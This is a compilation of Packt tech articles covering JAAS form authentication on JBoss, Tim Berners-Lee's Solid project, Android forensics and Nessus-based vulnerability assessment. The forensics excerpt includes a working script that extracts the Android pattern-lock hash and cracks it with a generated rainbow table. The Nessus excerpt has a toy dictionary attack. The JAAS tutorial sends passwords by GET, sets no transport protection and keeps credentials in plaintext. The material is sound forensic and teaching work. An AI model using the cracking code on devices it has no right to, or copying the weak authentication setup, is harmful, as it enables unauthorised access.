In this article, we covered the birth and concept of cybercrime and the challenges that law enforcement, academia, and security professionals face when combating its threatening behavior. We also explored the impact of cybercrime in numbers across varied geographical regions, industries, and devices.

Resources for Article: Further resources on this subject: Interactive Crime Map Using Flask [article] Web Scraping with Python [article]
JAAS-based security authentication on JSPs
Packt
18 Nov 2013
(For more resources related to this topic, see here.)

The deployment descriptor is the main configuration file of all web applications. The container first looks for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd.

The following are the schema elements available in the XSD:

<xsd:element name="security-constraint" type="j2ee:security-constraintType"/>
<xsd:element name="login-config" type="j2ee:login-configType"/>
<xsd:element name="security-role" type="j2ee:security-roleType"/>

Getting ready
You will need the following to demonstrate authentication and authorization:

- JBoss 7
- Eclipse Indigo 3.7
- Create a dynamic web project and name it Security Demo
- Create a package, com.servlets
- Create an XML file in the WebContent folder, jboss-web.xml
- Create two JSP pages, login.jsp and logoff.jsp

How to do it...
Perform the following steps to achieve JAAS-based security for JSPs:

1. Edit the login.jsp file with the input fields j_username and j_password, and submit it to SecurityCheckerServlet:

<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page language="java" %>
<html>
<HEAD>
<TITLE>PACKT Login Form</TITLE>
<SCRIPT>
function submitForm() {
    var frm = document.myform;
    if (frm.j_username.value == "") {
        alert("please enter your username, its empty");
        frm.j_username.focus();
        return;
    }
    if (frm.j_password.value == "") {
        alert("please enter the password, its empty");
        frm.j_password.focus();
        return;
    }
    frm.submit();
}
</SCRIPT>
</HEAD>
<BODY>
<FORM name="myform" action="SecurityCheckerServlet" METHOD=get>
<TABLE width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="white">
<TABLE width="100%" border="0" cellspacing="0" cellpadding="5">
<TR align="center">
    <TD align="right" class="Prompt"></TD>
    <TD align="left">
        <INPUT type="text" name="j_username" maxlength=20>
    </TD>
</TR>
<TR align="center">
    <TD align="right" class="Prompt"></TD>
    <TD align="left">
        <INPUT type="password" name="j_password" maxlength=20>
        <BR>
    </TD>
</TR>
<TR align="center">
    <TD align="right" class="Prompt"></TD>
    <TD align="left">
        <input type="submit" onclick="javascript:submitForm();" value="Login">
    </TD>
</TR>
</TABLE>
</TABLE>
</FORM>
</BODY>
</html>

The j_username and j_password fields are the indicators of using form-based authentication.

2. Let's modify the web.xml file to protect all the files that end with .jsp. If you try to access any JSP file, you will be given a login form, which in turn calls the SecurityCheckerServlet to authenticate the user. You can also see that role information is displayed. Update the web.xml file as shown in the following code snippet. We have used the 2.5 XSD.
The following code needs to be placed between the web-app tags in the web.xml file:

<display-name>jaas-jboss</display-name>
<welcome-file-list>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.htm</welcome-file>
    <welcome-file>index.jsp</welcome-file>
    <welcome-file>default.html</welcome-file>
    <welcome-file>default.htm</welcome-file>
    <welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<security-constraint>
    <web-resource-collection>
        <web-resource-name>something</web-resource-name>
        <description>Declarative security tests</description>
        <url-pattern>*.jsp</url-pattern>
        <http-method>HEAD</http-method>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
        <http-method>PUT</http-method>
        <http-method>DELETE</http-method>
    </web-resource-collection>
    <auth-constraint>
        <role-name>role1</role-name>
    </auth-constraint>
    <user-data-constraint>
        <description>no description</description>
        <transport-guarantee>NONE</transport-guarantee>
    </user-data-constraint>
</security-constraint>
<login-config>
    <auth-method>FORM</auth-method>
    <form-login-config>
        <form-login-page>/login.jsp</form-login-page>
        <form-error-page>/logoff.jsp</form-error-page>
    </form-login-config>
</login-config>
<security-role>
    <description>some role</description>
    <role-name>role1</role-name>
</security-role>
<security-role>
    <description>packt managers</description>
    <role-name>manager</role-name>
</security-role>
<servlet>
    <description></description>
    <display-name>SecurityCheckerServlet</display-name>
    <servlet-name>SecurityCheckerServlet</servlet-name>
    <servlet-class>com.servlets.SecurityCheckerServlet</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>SecurityCheckerServlet</servlet-name>
    <url-pattern>/SecurityCheckerServlet</url-pattern>
</servlet-mapping>

3. JAAS security checker and credential handler: the servlet acts as a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandler and add all the necessary imports. In the following SecurityCheckerServlet, we get the input from the JSP file and pass it to the CallbackHandler. We then pass the handler object to the LoginContext class, which has the login() method to do the authentication. On successful authentication, it will create a Subject and Principal for the user, with user details. We use the Iterator interface to iterate over the LoginContext object's principals to get the user details retrieved for authentication.

In the SecurityCheckerServlet class:

package com.servlets;

import java.io.IOException;
import java.io.PrintWriter;
import java.util.Iterator;
import java.util.Properties;

import javax.security.auth.Subject;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.login.LoginContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.jboss.security.SimplePrincipal;
import org.jboss.security.auth.callback.SecurityAssociationHandler;

public class SecurityCheckerServlet extends HttpServlet {
    private static final long serialVersionUID = 1L;

    public SecurityCheckerServlet() {
        super();
    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        char[] password = null;
        PrintWriter out = response.getWriter();
        try {
            SecurityAssociationHandler handler = new SecurityAssociationHandler();
            SimplePrincipal user = new SimplePrincipal(request.getParameter("j_username"));
            password = request.getParameter("j_password").toCharArray();
            handler.setSecurityInfo(user, password);
            // alternative JAAS callback handler built from the same credentials
            // (not passed to the LoginContext below)
            CallbackHandler myHandler = new UserCredentialHandler(
                    request.getParameter("j_username"),
                    request.getParameter("j_password"));
            LoginContext lc = new LoginContext("other", handler);
            lc.login();
            Subject subject = lc.getSubject();
            Iterator it = subject.getPrincipals().iterator();
            while (it.hasNext()) {
                Object principal = it.next();
                System.out.println("Authenticated: " + principal.toString());
                out.println("<b><html><body><font color='green'>Authenticated: "
                        + request.getParameter("j_username") + "<br/>"
                        + principal.toString() + "<br/></font></b></body></html>");
            }
            it = subject.getPublicCredentials(Properties.class).iterator();
            while (it.hasNext())
                System.out.println(it.next().toString());
            lc.logout();
        } catch (Exception e) {
            out.println("<b><font color='red'>failed authentication.</font></b>" + e);
        }
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
    }
}

4. Create the UserCredentialHandler file:

package com.servlets;

import java.io.IOException;

import javax.security.auth.callback.Callback;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.callback.NameCallback;
import javax.security.auth.callback.PasswordCallback;
import javax.security.auth.callback.UnsupportedCallbackException;

class UserCredentialHandler implements CallbackHandler {
    private String user, pass;

    UserCredentialHandler(String user, String pass) {
        super();
        this.user = user;
        this.pass = pass;
    }

    @Override
    public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException {
        for (int i = 0; i < callbacks.length; i++) {
            if (callbacks[i] instanceof NameCallback) {
                NameCallback nc = (NameCallback) callbacks[i];
                nc.setName(user);
            } else if (callbacks[i] instanceof PasswordCallback) {
                PasswordCallback pc = (PasswordCallback) callbacks[i];
                pc.setPassword(pass.toCharArray());
            } else {
                throw new UnsupportedCallbackException(callbacks[i], "Unrecognized Callback");
            }
        }
    }
}

5. In the jboss-web.xml file:

<?xml version="1.0" encoding="UTF-8"?>
<jboss-web>
    <security-domain>java:/jaas/other</security-domain>
</jboss-web>

Here, other is the name of the application policy defined in the login-config.xml file. All of this will be packaged as a .war file.

6. Configure the JBoss application server. Go to jboss-5.1.0.GA/server/default/conf/login-config.xml in JBoss. If you look at the file, you can see various configurations for databases and LDAP, as well as a simple one using properties files, which I have used in the following code snippet:

<application-policy name="other">
    <!-- A simple server login module, which can be used when the number of
         users is relatively small. It uses two properties files:
         users.properties, which holds users (key) and their password (value).
         roles.properties, which holds users (key) and a comma-separated list
         of their roles (value).
         The unauthenticatedIdentity property defines the name of the principal
         that will be used when a null username and password are presented as
         is the case for an unauthenticated web client or MDB. If you want to
         allow such users to be authenticated, add the property, e.g.,
         unauthenticatedIdentity="nobody" -->
    <authentication>
        <login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag="required">
            <module-option name="usersProperties">users.properties</module-option>
            <module-option name="rolesProperties">roles.properties</module-option>
            <module-option name="unauthenticatedIdentity">nobody</module-option>
        </login-module>
    </authentication>
</application-policy>

7. Create the users.properties file in the same folder. The following are the users.properties and roles.properties files, with the username mapped to a password and a role respectively:
users.properties:
anjana=anjana123

roles.properties:
anjana=role1

8. Restart the server.

How it works...
JAAS consists of a set of interfaces to handle the authentication process. They are:

- The CallbackHandler and Callback interfaces
- The LoginModule interface
- LoginContext

The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific; each container has its own implementation. Here, we are using the JBoss application server to demonstrate JAAS. In the previous example, I have explicitly called the JAAS interfaces. UserCredentialHandler implements the CallbackHandler interface, so CallbackHandlers are storage spaces for the user credentials, and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to the LoginModule interfaces for authentication:

CallbackHandler myHandler = new UserCredentialHandler(request.getParameter("j_username"), request.getParameter("j_password"));
LoginContext lc = new LoginContext("other", handler);
lc.login();

The web.xml file defines the security mechanisms and also points us to the protected resources in our application.

The following screenshot shows a failed authentication window:

The following screenshot shows a successful authentication window:

Summary
We introduced the JAAS-based mechanism of applying security to authenticate and authorize users to the application.

Resources for Article: Further resources on this subject: Spring Security 3: Tips and Tricks [Article] Spring Security: Configuring Secure Passwords [Article] Migration to Spring Security 3 [Article]
Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018
Sugandha Lahoti
25 Oct 2018
At the ongoing 40th International Conference of Data Protection and Privacy Commissioners (ICDPPC), Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference, which is taking place in Brussels this week, brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high-profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor, on 'Choose Humanity: Putting Dignity back into Digital'; a video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO of Apple, on personal data and user privacy; and 'What is Ethics?' by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania, among others.

Per TechCrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. "Ethics, like technology, is design. As we're designing the system, we're designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society," he told the delegates present at the conference.

He also described digital platforms as "socio-technical systems" — meaning "it's not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written". "We must consciously decide on both of these, both the social side and the technical side," he said. "The tech platforms are anthropogenic. They're made by people. They're coded by people. And the people who code them are constantly trying to figure out how to make them better."

According to TechCrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how socio-technical systems are exploding simple notions of individual rights. "Your data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it's not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too."

He also revealed new plans for his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to get rid of gigantic tech monopolies' (Facebook, Google, Amazon, and so on) stronghold over user data. He hopes to achieve this with Inrupt's new open-source project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data. The app, he explains, asks you where you want to put your data, so you can run your photo app or take pictures on your phone and choose to store them on Dropbox or on your own home computer. And it does this with a new technology that provides interoperability between any app and any store.

"The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up.
You are in control of your data life… Wherever you store it, you can control and get access to it."

He concluded by saying, "We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out."

The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely the Universal Guidelines on Artificial Intelligence, at ICDPPC.

Tim Berners-Lee plans to decentralize the web with 'Solid', an open-source project for "personal empowerment through data"
EPIC's Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018
California's tough net neutrality bill passes state assembly vote.
Mobile Phone Forensics: A First Step into Android Forensics
Packt
15 Oct 2015
In this article by Michael Spreitzenbarth and Johann Uhrmann, authors of the book Mastering Python Forensics, we will see that even though the forensic analysis of standard computer hardware—such as hard disks—has developed into a stable discipline with a lot of reference work, the techniques used to analyze non-standard hardware or transient evidence are still debatable. Despite their increasing role in digital investigations, smartphones are still considered non-standard because of their heterogeneity. In all investigations, it is necessary to follow the basic forensic principles. The two main principles are as follows:

- The greatest care must be taken to ensure that the evidence is manipulated or changed as little as possible.
- The course of a digital investigation must be understandable and open to scrutiny. At best, the results of the investigation must be reproducible by independent investigators.

The first principle is a challenge in the smartphone setting, as most smartphones employ specific operating systems and hardware protection methods that prevent unrestricted access to the data on the system. The preservation of data from hard disks is, in most cases, a simple and well-known procedure. An investigator removes the hard disk from the computer or notebook, connects it to his workstation with the help of a write blocker (for example, Tableau's TK35), and starts analyzing it with well-known and certified software solutions. Compared to this, it becomes clear that the smartphone world has no such procedure. Nearly every smartphone has its own way of building its storage, so investigators need a specific way to get the storage dump of each smartphone. While it is difficult to get the data from a smartphone, one can also get much more data, of far greater diversity, from it. Smartphones store, besides the usual data (for example, pictures and documents), data such as GPS coordinates or the position of the mobile cell that the smartphone was connected to before it was switched off. Considering the resulting opportunities, it turns out that the extra expense is worth it for an investigator. In the following sections, we will show you how to start such an analysis on an Android phone.

Circumventing the screen lock
Circumventing the screen lock is always a good starting point for the analysis. As you may know, it is very easy to get around the pattern lock on an Android smartphone. In this brief article, we will describe the following two ways to get around it:

- On a rooted smartphone
- With the help of the JTAG interface

Some background information
The pattern lock is entered by users joining the points on a 3×3 matrix in their chosen order. Since Android 2.3.3, this pattern involves a minimum of 4 points (on older Android versions, the minimum was 3 points), and each point can only be used once. The points of the matrix are registered in numbered order, starting from 0 in the upper-left corner and ending with 8 in the bottom-right corner. So, the pattern of the lock screen in the following figure would be 0 – 3 – 6 – 7 – 8:

Android stores this pattern in a special file called gesture.key in the /data/system/ directory. As storing the pattern in plain text is not safe, Android only stores an unsalted SHA1-hashsum of this pattern (refer to the following code snippet).
Accordingly, our pattern is stored as the following hashsum:

c8c0b24a15dc8bbfd411427973574695230458f0

The code snippet is as follows:

private static byte[] patternToHash(List<LockPatternView.Cell> pattern) {
    if (pattern == null) {
        return null;
    }
    final int patternSize = pattern.size();
    byte[] res = new byte[patternSize];
    for (int i = 0; i < patternSize; i++) {
        LockPatternView.Cell cell = pattern.get(i);
        res[i] = (byte) (cell.getRow() * 3 + cell.getColumn());
    }
    try {
        MessageDigest md = MessageDigest.getInstance("SHA-1");
        byte[] hash = md.digest(res);
        return hash;
    } catch (NoSuchAlgorithmException nsa) {
        return res;
    }
}

Because the pattern has a finite and very small number of possible combinations, the use of an unsalted hash isn't very safe. It is possible to generate a dictionary (rainbow table) with all possible hashes and compare the stored hash with this dictionary within a few seconds. To ensure some more safety, Android stores the gesture.key file in a restricted area of the filesystem, which cannot be accessed by a normal user. If you have to get around it, there are two ways to choose from.

On a rooted smartphone
If you are dealing with a rooted smartphone and USB debugging is enabled, cracking the pattern lock is quite easy. You just have to dump the /data/system/gesture.key file and compare the bytes of this file with your dictionary. These steps can be automated with the help of the following Python script:

#!/usr/bin/python

import os
import sqlite3
import subprocess
import sys
from binascii import hexlify

SQLITE_DB = "GestureRainbowTable.db"

def crack(backup_dir):
    # dump the system file containing the hash
    print "Dumping gesture.key ..."
    subprocess.Popen(['adb', 'pull', '/data/system/gesture.key', backup_dir],
        stdout=subprocess.PIPE, stdin=subprocess.PIPE,
        stderr=subprocess.PIPE).communicate()

    # read the raw 20-byte SHA1-hashsum and convert it to a hex string
    gesturehash = open(backup_dir + "/gesture.key", "rb").read(20)
    lookuphash = hexlify(gesturehash).decode()
    print "HASH: \033[0;32m" + lookuphash + "\033[m"

    # look the hash up in the rainbow table
    conn = sqlite3.connect(SQLITE_DB)
    cur = conn.cursor()
    cur.execute("SELECT pattern FROM RainbowTable WHERE hash = ?", (lookuphash,))
    gesture = cur.fetchone()[0]
    return gesture

if __name__ == '__main__':
    # check that a device is connected and visible to adb
    if subprocess.Popen(['adb', 'get-state'],
            stdout=subprocess.PIPE).communicate()[0].split("\n")[0] == "unknown":
        print "no device connected - exiting..."
        sys.exit(2)

    # create the output directory if it does not exist yet
    backup_dir = sys.argv[1]
    try:
        os.stat(backup_dir)
    except:
        os.mkdir(backup_dir)

    gesture = crack(backup_dir)
    print "Screenlock Gesture: \033[0;32m" + gesture + "\033[m"
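The script above assumes that GestureRainbowTable.db already exists. If you need to build it yourself, a minimal sketch along the following lines would work. The RainbowTable (hash, pattern) schema is inferred from the query in the crack script, and the enumeration is a superset of the patterns Android actually accepts (adjacency rules are ignored), which is harmless extra data in a lookup table:

#!/usr/bin/python
# Minimal sketch: build GestureRainbowTable.db for the crack script above.
# Enumerates every ordering of 4 to 9 distinct points (0-8) and stores the
# unsalted SHA1 of the byte sequence, mirroring patternToHash().
import hashlib, sqlite3
from itertools import permutations

conn = sqlite3.connect("GestureRainbowTable.db")
cur = conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS RainbowTable "
            "(hash TEXT PRIMARY KEY, pattern TEXT)")

for length in range(4, 10):                       # patterns use 4 to 9 points
    for points in permutations(range(9), length): # each point used at most once
        digest = hashlib.sha1(''.join(chr(p) for p in points)).hexdigest()
        cur.execute("INSERT OR IGNORE INTO RainbowTable VALUES (?, ?)",
                    (digest, '-'.join(str(p) for p in points)))

conn.commit()
conn.close()

For the example pattern 0 – 3 – 6 – 7 – 8, this stores the hash c8c0b24a15dc8bbfd411427973574695230458f0 alongside the pattern string, which is exactly the row that the crack() function looks up.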
With the help of the JTAG interface
If you are dealing with a stock or at least an unrooted smartphone, the whole process is a bit more complicated. First of all, you need special hardware, such as a Riff-Box and a JIG adapter, or some soldering skills. After you have gained a physical dump of the complete memory chip, the chase for the pattern lock can start. In our experiment, we used an HTC Wildfire with a custom ROM and Android 2.3.3 flashed on it, and the pattern lock that we just saw in this article. After looking at the dump, we noticed that every chunk has an exact size of 2048 bytes. Since we know that our gesture.key file holds 20 bytes of data (the SHA1-hashsum), we searched for this combination of bytes and noticed that there is one chunk starting with these 20 bytes, followed by 2012 bytes of zeroes and 16 arbitrary bytes (this seems to be some metadata of the filesystem).

We did a similar search on several other smartphone dumps (mainly older Android versions on the same phone), and it turned out that this method is the easiest way to get the pattern lock without being root. In other words, we do the following:

- Try to get a physical dump of the complete memory
- Search for a chunk with a size of 2048 bytes, starting with 20 arbitrary bytes, followed by 2012 zero bytes and 16 arbitrary bytes
- Extract the 20 bytes at the beginning of the chunk
- Compare these 20 bytes with your dictionary
- Type in the corresponding pattern on the smartphone

Summary
In this article, we demonstrated how to get around the screen lock on an Android smartphone if the user has chosen a pattern to protect the smartphone against unauthorized access. Circumventing this protection can help investigators during the analysis of a smartphone in question, as they are then able to navigate through the apps and the smartphone UI in order to search for interesting sources or to prove their findings. This step is only the first part of an investigation; if you would like more details about further steps and investigations on different systems, the book Mastering Python Forensics could be a great place to start.

Resources for Article: Further resources on this subject: Evidence Acquisition and Analysis from iCloud [article] BackTrack Forensics [article] Introduction to Mobile Forensics [article]
Tim Berners-Lee plans to decentralize the web with 'Solid', an open-source project for "personal empowerment through data"
Natasha Mathur
01 Oct 2018
Tim Berners-Lee, the creator of the World Wide Web, revealed his plans for changing the web for the better as he launched his new startup, Inrupt, last Friday. His major goal with Inrupt is to decentralize the web and to get rid of tech giants' monopolies (Facebook, Google, Amazon, and so on) on user data. He hopes to achieve this with Inrupt's new open-source project, Solid, a platform built using the existing web format. Tim has been working on Solid over recent years in collaboration with people at MIT.

"I've always believed the web is for everyone. That's why I and others fight fiercely to protect it. The changes we've managed to bring have created a better and more connected world. But for all the good we've achieved, the web has evolved into an engine of inequity and division; swayed by powerful forces who use it for their own agendas," said Tim in his announcement blog post.

Solid to provide users with more control over their data
Solid will work on completely changing the current web model, in which users hand over their personal data to digital giants "in exchange for perceived value". "Solid is how we evolve the web in order to restore balance - by giving every one of us complete control over data, personal or not, in a revolutionary way," says Tim.

Solid offers every user a choice regarding where their data gets stored, which specific people and groups can access selected elements of that data, and which apps are used. It will enable you, your family, and colleagues to link and share data with anyone. Also, with Solid, people can look at the same data with different apps at the same time. Solid technology is built on existing web formats, and developers will have to integrate Solid into their apps and sites. Solid hopes to empower individuals, developers, and businesses across the globe with totally new ways to build and find innovative and trusted applications. "I see multiple market possibilities, including Solid apps and Solid data storage," adds Tim.

According to Katrina Brooker, a writer at Fast Company, "every bit of data you create or add on Solid exists within a Solid pod". A Solid pod is a personal online data store. These pods provide Solid users with control over their applications and information on the web. Whoever uses the Solid platform gets a Solid identity and a Solid pod. This is how Solid will enforce "personal empowerment through data" by helping users take back the power of the web from gigantic corporations.

Additionally, Tim told Brooker that he is currently working on a way to create a decentralized version of Alexa, Amazon's popular digital assistant. "He calls it Charlie. Unlike with Alexa, on Charlie people would own all their data. That means they could trust Charlie with, for example, health records, children's school events, or financial records. That is the kind of machine Berners-Lee hopes will spring up all over Solid to flip the power dynamics of the web from corporations to individuals," writes Brooker.

Given the recent Facebook security breach that compromised 50M user accounts, and past data misuse scandals such as the Cambridge Analytica scandal, Solid seems to be an angel in disguise that will transfer the power of data control into the hands of users. However, there is no guarantee that Solid will be widely accepted by everyone, as a lot of companies on the web are extremely sensitive when it comes to their data. They might not be interested in losing control over that data.
But, it’s definitely going to take us one step ahead, to a more free and open Internet. Tim has taken a sabbatical from MIT and has reduced his day-to-day involvement with the World Wide Web Consortium (W3C) to work full time on Inrupt. “It is going to take a lot of effort to build the new Solid platform and drive broad adoption but I think we have enough energy to take the world to a new tipping point,” says Tim. For more coverage on this news, check out the official Inrupt blog.
Fundamentals
Packt
20 Jan 2014
(For more resources related to this topic, see here.)

Vulnerability Assessment and Penetration Testing
Vulnerability Assessment (VA) and Penetration Testing (PT or PenTest) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide the best outcomes if they are used optimally. An improper configuration may lead to multiple false positives, that is, findings that do not reflect true vulnerabilities. Vulnerability assessment tools are widely used by all, from small organizations to large enterprises, to assess their security status. This helps them make timely decisions to protect themselves from these vulnerabilities. Nessus is a widely recognized tool for conducting Vulnerability Assessments and PenTests. This section introduces you to the basic terminology of these two types of assessments.

A vulnerability, in terms of IT systems, can be defined as a potential weakness in a system or infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute-force attack (dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system.
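To make the idea concrete, here is a toy sketch of such a dictionary attack. Every value below, including the wordlist, the target password, and the use of an unsalted SHA1 hash, is hypothetical and chosen purely for illustration:

#!/usr/bin/python
# Toy dictionary attack: hash each candidate word and compare it with a
# captured password hash. All values here are hypothetical.
import hashlib

target_hash = hashlib.sha1("dragon").hexdigest()   # stands in for a leaked hash
wordlist = ["password", "123456", "letmein", "dragon", "qwerty"]

for guess in wordlist:
    if hashlib.sha1(guess).hexdigest() == target_hash:
        print "Password recovered: %s" % guess
        break
else:
    print "No match in wordlist"

A real attacker would run a far larger wordlist against hashes captured from the target system; the defense is equally simple in principle: disallow dictionary words and salt the stored hashes.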
Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses a set of plugins corresponding to different types of known security loopholes in infrastructure, or using a manual, checklist-based approach that relies on best practices and vulnerabilities published on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming. The kinds of checks that are performed by a vulnerability assessment tool can also be done manually, but this will take a lot more time than an automated tool. Penetration Testing adds one step to vulnerability assessment: exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities and, as a next step, will try to penetrate the system by exploiting the identified vulnerabilities.

Need for Vulnerability Assessment
It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits of conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding.

Risk prevention
Vulnerability Assessment uncovers the loopholes/gaps/vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance with the different compliance and regulatory requirements, since you already know your vulnerabilities. Awareness of such vulnerabilities in time can help an organization fix them and mitigate the risks involved before they get exploited. The risks of a vulnerability getting exploited include:

- Financial loss due to vulnerability exploits
- Damage to the organization's reputation
- Data theft
- Confidentiality compromise
- Integrity compromise
- Availability compromise

Compliance requirements
The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors, such as banking and telecom.

The life cycles of Vulnerability Assessment and Penetration Testing
This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle:

- Scoping
- Information gathering
- Vulnerability scanning
- False positive analysis
- Vulnerability exploitation (Penetration Testing)
- Report generation

The following figure illustrates the different sequential stages recommended for a Vulnerability Assessment or Penetration Testing:

Summary
In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and the steps for installing and setting up Nessus.

Resources for Article: Further resources on this subject: CISSP: Vulnerability and Penetration Testing for Access Control [Article] Penetration Testing and Setup [Article] Web app penetration testing in Kali [Article]